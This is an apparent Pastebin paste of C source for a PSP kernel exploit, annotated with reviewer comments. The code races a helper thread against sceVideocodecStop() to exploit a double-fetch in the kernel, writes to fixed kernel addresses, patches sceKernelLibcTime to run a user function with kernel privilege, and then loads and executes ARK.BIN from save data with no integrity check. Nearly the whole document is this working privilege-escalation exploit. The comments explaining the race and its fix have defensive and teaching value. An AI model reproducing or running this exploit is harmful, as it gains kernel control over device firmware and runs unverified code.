
Untitled

a guest Feb 21st, 2015 2,144 Never
  #include <pspkernel.h>

  /*
   * File-scope state shared by every function in this listing.
   *
   * storethread() runs on its own thread and reads `running` and `sw_address`
   * while do_exploit() writes them; both threads also store into a0[11].
   * None of these objects is volatile, atomic or lock-protected.
   */
  u32 sceMeCodecWrapper = 0x88136800; /* hard-coded base; the word at +0x2F80 is read and written below */
  u32 sw_address = 0;                 /* value storethread() keeps copying into a0[11] */
  int is_exploited = 0;               /* set to 1 by KernelContent(), polled by do_exploit() */
  int running = 1;                    /* storethread() loops while this equals 1 */
  u32 a0[24];                         /* argument block passed to sceVideocodecStop() */

  /*
   * Helper-thread body: stores sw_address into a0[11] over and over, calling
   * sceKernelDelayThread(1) between stores, until `running` is no longer 1,
   * then ends the thread with exit status 0.
   *
   * do_exploit() writes a different value into the same slot and then calls
   * sceVideocodecStop(a0, 0), so the slot can change while that call is in
   * progress. That is the shape of a double-fetch (time-of-check/time-of-use)
   * race on a caller-owned argument block. The usual callee-side defence is to
   * copy the block into private memory once, then validate and use only that
   * copy.
   * NOTE(review): how the callee reads a0[11] is not visible in this file.
   *
   * The function is declared int but has no return statement; control is
   * presumably not expected to come back from sceKernelExitThread().
   */
  int storethread()
  {
          for (;;) {
                  if (running != 1)
                          break;

                  a0[11] = sw_address;
                  sceKernelDelayThread(1);
          }

          sceKernelExitThread(0);
  }

  /*
   * Routine whose address do_exploit() passes (ORed with 0x80000000) as the
   * second argument of its sceKernelLibcTime call.
   *
   * In order, it: sets is_exploited so the caller's loop ends; zeroes $k1;
   * creates a mutex named "SceKermitMe" and stores its UID at
   * sceMeCodecWrapper + 0x2F80; overwrites two instruction words at
   * 0x8800F9C4 and 0x8800F9C8; and runs two cache-maintenance routines through
   * hard-coded addresses.
   *
   * Every store here targets a 0x88xxxxxx address, and the patch below writes
   * instruction words into one of them.
   * NOTE(review): this presumably only works once execution is already
   * privileged; a kernel that keeps its text read-only would reject the patch.
   * Confirm against the platform's memory map.
   * NOTE(review): the absolute addresses are not derived from anything in this
   * file, so they are presumably tied to one specific firmware build.
   */
  void KernelContent()
  {
          is_exploited = 1;

          // Zero $k1.
          // NOTE(review): kernel entry points on this platform are commonly
          // described as using $k1 when checking caller-supplied pointers - confirm.
          __asm("move $k1, $0;");

          // "Restore" the me_wrapper mutex UID: look up the ThreadManForUser export
          // with NID 0xB7D098C6 and call it through a mutex-create prototype.
          SceUID (* _sceKernelCreateMutex)(const char *name, u32 attr, int init_count, void *options) = \
                  (void *)FindExport("sceThreadManager", "ThreadManForUser", 0xB7D098C6);

          SceUID mutex = _sceKernelCreateMutex("SceKermitMe", 256, 0, NULL);

          // Put the new UID into the word that do_exploit()'s first loop aimed at
          // (sw_address + 36 equals this address there).
          _sw(mutex, sceMeCodecWrapper + 0x2F80);

          // sceKernelLibcTime: patched to jump to the address passed in the first
          // argument; per the original author it is restored later by the ARK code.
          _sw(0x00800008, 0x8800F9C4);    //jr    $a0
          _sw(0, 0x8800F9C8);             //nop

          // Cache routines reached through absolute addresses rather than imports.
          void (* _sceKernelDcacheWritebackInvalidateAll)(void) = (void *)0x88000744;
          void (* _sceKernelIcacheInvalidateAll)(void) = (void *)0x88000E98;

          // Write the patched words back and drop stale instruction-cache lines so
          // the new instructions are the ones fetched.
          _sceKernelDcacheWritebackInvalidateAll();
          _sceKernelIcacheInvalidateAll();
  }

  /*
   * Main sequence of the listing. It starts the storethread() helper, calls
   * sceVideocodecStop(a0, 0) in two polling loops while the helper rewrites
   * a0[11], then loads ARK.BIN from the memory stick to address 0x10000 and
   * calls it.
   *
   * Reviewer summary: the argument block a0 stays writable by a second thread
   * for the whole duration of each sceVideocodecStop call, and one of its slots
   * alternates between 0x09000000 and an 0x88xxxxxx value. A callee that
   * validates such a field and later re-reads it from the caller's memory can
   * be made to act on the unvalidated value.
   * NOTE(review): the callee's behaviour is inferred, not shown here.
   * Snapshotting the block before validation closes that window.
   *
   * No return value of any call in this function is checked.
   */
  void do_exploit()
  {
          is_exploited = 0;
          running = 1;

          // First value for the helper thread: 36 bytes below the word at
          // sceMeCodecWrapper + 0x2F80 (the one KernelContent() later rewrites).
          // NOTE(review): the -36 presumably mirrors an offset the callee adds to the
          // pointer it takes from a0[11] - not visible in this file.
          sw_address = (sceMeCodecWrapper + 0x2F80) - 36;

          // Start storethread() on a user-attribute thread (priority 8, 512-byte stack).
          SceUID thid = sceKernelCreateThread("thid", storethread, 8, 512, THREAD_ATTR_USER, NULL);
          sceKernelStartThread(thid, 0, NULL);

          // NOTE(review): 0x300 / 0x303 are presumably the utility-module ids that
          // make the sceVideocodec import below resolvable - confirm.
          sceUtilityLoadModule(0x300);
          sceUtilityLoadModule(0x303);

          // Resolve the sceVideocodec import with NID 0xA2F0564E via FindImport()
          // (defined elsewhere).
          int (* sceVideocodecStop)(u32 *a0, int a1) = (void *)FindImport("sceVideocodec", 0xA2F0564E, 0);

          memset(a0, 0, sizeof(a0));

          a0[0] = 0x05100601;
          a0[15] = 1;

          int i; // unused

          // Loop 1: re-arm slots 2, 3, 4, 11 and 15 and call again until slot 2 reads
          // 0x800201C3.
          // NOTE(review): presumably an error status the callee leaves in a0[2] once
          // the word at sw_address + 36 has been changed - confirm.
          while (a0[2] != 0x800201C3) {
                  a0[15] = 1;
                  a0[3] = 0x09000000;
                  a0[4] = 0x09000000;
                  a0[2] = 0;
                  a0[11] = 0x09000000; // storethread() concurrently stores sw_address here

                  sceVideocodecStop(a0, 0);
          }

          fillvram(-1); // defined elsewhere; presumably an on-screen progress marker

          // Retarget the helper thread: sw_address + 36 is now 0x8800F9C4, the same
          // address KernelContent() patches.
          sw_address = 0x8800F9C4 - 36;

          // Call sceKernelLibcTime through a two-argument prototype.
          int (* _sceKernelLibcTime)(u32, u32) = (void *)sceKernelLibcTime;

          // Loop 2: repeat the call until KernelContent() has run and set is_exploited.
          while (is_exploited != 1) {
                  a0[15] = 1;
                  a0[11] = 0x09000000; // again raced by storethread()
                  a0[3] = 0x09000000;
                  a0[4] = 0x09000000;

                  sceVideocodecStop(a0, 0);

                  sceKernelDcacheWritebackAll();

                  // Second argument is KernelContent's address with bit 31 set.
                  _sceKernelLibcTime(0x08800000, ((u32)&KernelContent | 0x80000000));
          }

          fillvram(0xFF00);

          // Lets storethread() leave its loop and exit.
          running = 0;

          // 16 KiB staging buffer on the stack.
          u8 buf[0x4000];

          // Neither the descriptor nor the byte count is checked, and the copy below
          // always moves the full 0x4000 bytes. If the open or read falls short, the
          // remainder is whatever the stack held.
          SceUID fd = sceIoOpen("ms0:/PSP/SAVEDATA/NPUG80320KEXPLOIT/ARK.BIN", PSP_O_RDONLY, 0777);
          sceIoRead(fd, buf, sizeof(buf));
          sceIoClose(fd);

          memcpy((void *)0x10000, buf, sizeof(buf));

          sceKernelDcacheWritebackAll();

          // The copied bytes are called as a function and given the save-data
          // directory path. Nothing checks the file's integrity or origin, so
          // whatever is stored at that path is what runs.
          void (* Start)(const char *) = (void *)0x10000;
          Start("ms0:/PSP/SAVEDATA/NPUG80320KEXPLOIT/");
  }

  /*
   * Program entry point, placed in the ".text.start" section. Calls
   * fillvram(0x80808080), then runs do_exploit(), then sceKernelExitGame() if
   * do_exploit() returns. fillvram() is defined elsewhere.
   */
  __attribute__ ((section (".text.start")))
  void _start()
  {
          fillvram(0x80808080);

          do_exploit();

          sceKernelExitGame();
  }